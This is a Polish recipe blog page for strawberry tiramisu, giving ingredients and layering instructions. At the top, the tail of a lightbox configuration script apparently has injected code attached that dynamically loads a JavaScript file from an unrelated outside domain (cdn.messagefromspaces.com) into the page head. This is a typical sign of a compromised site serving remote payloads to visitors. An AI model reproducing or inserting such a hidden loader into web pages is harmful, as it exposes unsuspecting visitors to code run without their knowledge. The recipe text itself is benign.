, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })

truskawkowe tyrajmisiu

Wydrukuj artykuł Wydrukuj artykuł

Tiramisu z truskawkami

Doskonały deser mocno truskawkowy w mig gotowy:)

Składniki:

  • 1 kg truskawek
  • 250 ml śmietanki kremówki
  • 250 g serka mascarpone
  • pół szklanki cukru pudru
  • opakowanie biszkoptów
  • pół szklanki gorzkiej herbaty

Śmietankę ubić (najlepiej przed ubiciem mocno schłodzić ~ np. przez 10 minut w zamrażarce). Pod koniec ubijania dodać cukier. Potem partiami dodawać serek mascarpone i delikatnie ubijać do ujednolicenia kremu.

Na dno naczynia wyłożyć biszkopty. Nasączyć je gorzką herbatą. Przykryć warstwą kremu. Poukładać kawałki truskawek. Ułożyć drugą warstwę biszkoptów i nasączyć je herbatą. Całość przykryć resztą kremu. Na wierzchu ułożyć połówki truskawek.

Kategoria: Bez kategorii Komentarz »


Skomentuj...



Początek strony